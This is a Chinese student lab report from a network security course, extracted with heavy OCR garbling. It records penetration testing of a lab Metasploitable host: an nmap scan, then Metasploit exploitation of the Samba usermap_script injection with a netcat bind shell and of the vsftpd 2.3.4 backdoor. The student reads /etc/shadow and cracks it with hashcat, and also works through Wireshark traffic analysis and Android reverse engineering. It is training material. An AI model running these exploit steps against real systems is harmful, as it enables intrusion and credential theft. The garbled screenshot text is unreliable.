《课程实验报告.docx》由会员分享,可在线阅读,更多相关《课程实验报告.docx(10页珍藏版)》请在第壹文秘上搜索。
1、等中科技火浮课程实验报告课程名称:网络空间安全综合实践山专业班级:学号:姓名:报告日期:2021625一、实验过程中遇到的问题和解决方法1.1. 渗透测试和流量分析本次实验分为渗透测试和流量分析两个部分。1.1.1. 渗透测试渗透测试实验主要是熟练运用发现漏洞和利用漏洞的命令。首先进行端口扫描来发现漏洞:nmap-T4-sV-v192.168.206.131FileActionsEditViewHaPNotshown:977closedportsIPORTSERVICEVERSION21/Up“PVSftpd2.3.422/UpSShOpenSSH.7lDebian8d3.X-4.X(work
2、group:WORKGROUP)445/tCPnetbios-ssnSambasHd3.X-4.X(workgroup:WORKGROUP)512/tcp“0Cnetkit-rshrexecd513/tcploginOponBSOorSolarisHogind5Utcptcpwrjppd1099/tcpava-raiGNUCUsspathgriregistry1524/tCpblrdsheUNetasploitablerootshell2049/tCpnfs2-(RPCffieM3)2ltcpHPProFTPO1.3.133MtcpMySQl5.e.51a-3ubs:/nnap.orgsuti
3、t/.Nnapdone:1IPaddress(1hostup)scannedin12.29secondsTI从而发现SAMBAMS-RPCSHE1.1.命令注入漏洞。在执行漏洞攻击的过程中,我们先启动Metasploit,搜索有关samba漏洞的代码库:searchsamba然后使用USernIap_script代码,查看攻击载荷:useexploit/multi/samba/usermapscriptshowpayloads接着选择bindnetcat,即使用netcat工具在渗透攻击成功后执行shel1并通过netcat绑定在一个监听端口上:setpayloademd/unix/bindn
4、etcat在查看参数配置后,设置目标ip、Port等参数:showoptionssetRHOST192.168.206.1315msf5searchVSftPdMatchingModulesNameDisclosureDateRankCheckDescription0xploitunix/ftp/SBH.234.backdoor2011-07-03excellentNoVSFFPQv23.4BackdoorCoemandExecutionmsf5useexploit/unix/ftp/vsftpd_23showoptionsModuleoptions(exploitunixftpvsftpd_
5、234-backdoor):NameCurrentSettingRequiredDescriptionRHOSTSysThetargethost(s)vrangeCIORIdentifierlorhostsfilewithsyntax,file,RPORT21yesThetargetport(TCP)Payloadoptions(cmd/unix/interact):NameCurrentSettingRequiredDescriptionExploittarget:IdNane0AutOMticElfSexploit()setRHOST192.168.206.131RHOST=192168.
6、2G6.13】执行攻击exploit,输入vimetcshadow即获得shadow文件,之后使用hashcat跑出密码即得1.1.2.流量分析在流量分析实验中,主要问题在于如何找到流量包中的原始数据信息。采取的方法是对流量包进行过滤,通过=6200以及tcportcp-data对ftp和ftp-data包进行过滤:甥3:SJ:S:Ig:SJ:SM:7akc:$rC-2.2.2.2.2.2.2.2.2.2.2.2.2. 4:4C&X.) 密器匿匿也捻蠹M!s第&雳 讪曲瞄掾Is:M最温瓯型需!Mll.fCV-*no 22d 7.1.4)ns gt p: u PC I1: 1 SMltcaiM
7、to Bury Mt QWTPgg: 22 (r*fT 2.1.4) sc acwmrP3* *9*ciy th f*M* 19r *xc*m1.KtCWU43(M:M:2T:4:X:4)然后跟踪tcp流,获得原始数据后将数据保存。接着打开保存的tgz文件,发现passwd文件和shadow文件,从而根据文件中的数据进行破解。1.2.逆向分析本次逆向分析实验的整体难度相对较大,工作量也相对较多。这部分的实验的主要内容为流量分析、函数调用栈动态跟踪、函数参数动态跟踪和二进制代码分析。1.2.1.流量分析流量分析实验的主要问题在于借助Wireshark抓取Android模拟器中“同步助手”登录和同
8、步数据时的流量,分析同步流量的数据特征,并根据这些特征,获取报文的一些信息,例如密文长度信息等。采取的方式是用wireshark对同步信息的过程进行抓包,同步信息完成后停止抓包。设置过滤内容为dns,观察到的ip地址为113.96.237.110:aS-eq*iz.X0C3Jl4.fTlMSve*MIIMttM*t*llflctkX221.92101510.12.168.?202.114.1?1CKS77Stenderdqrc.X231.924421202.11A.0.13110.U.U8.83MS1Standardqeryresponsex93Anpssync.3g.M.cu加 “Mt=*.
9、M:U 6 wlr Htc)f M M* rjrt*r*l rMiFv.24S出,0NS* DKl k,lZ.59:Ig:自)IntbF Frcccol rU8 4, Wi l.12.l6t.t). DKi 1D.M.297.1.2M387ATa;口8:二:方14M: WMXM:86IG = 3 C 二 M追踪tcp流,并以16进值查看,得出数据加密类型是分组加密。1.2.2.函数调用栈动态跟踪函数调用栈动态跟踪实验的主要问题在于分析出PC端与模拟器端连接的端口是多少。使用AndrOidkiller打开要分析的文件得知包名为nt.pim找到并运行,得出nt.pim的调试端口为8605,DDMS
10、的接收信息端口为87006De5e OQNamtacom.tBrKnt/nobftqqA4 SF60488601CfrundroidJcyha18898602COmUndrdIdohQne157086034n(jrol4rocsscorv21808607C8MnrddSymmur15758608ConXandroid JaUnCbtr318678609CorrundEdfysnhigrrrdWdOMiSWr 20648610ConMndrOfdMy 如 kworm19698611conrndr0*dvbvvMbvwa.ftrc0 28018612Sadms28439658213377ceDUtw42SHWi tfm, dual clock)26502.700 2750 2.9002 JcMPcfTMdro),d4ry3d46928613systsmjxocftss14328614frundro(d4)ftspoo19168615CorrutarKen1.sscuredawnloadjervke76448616fttftotnobneqq77408617coxandro2d4ttihgs16308618(orYMfJrooreserv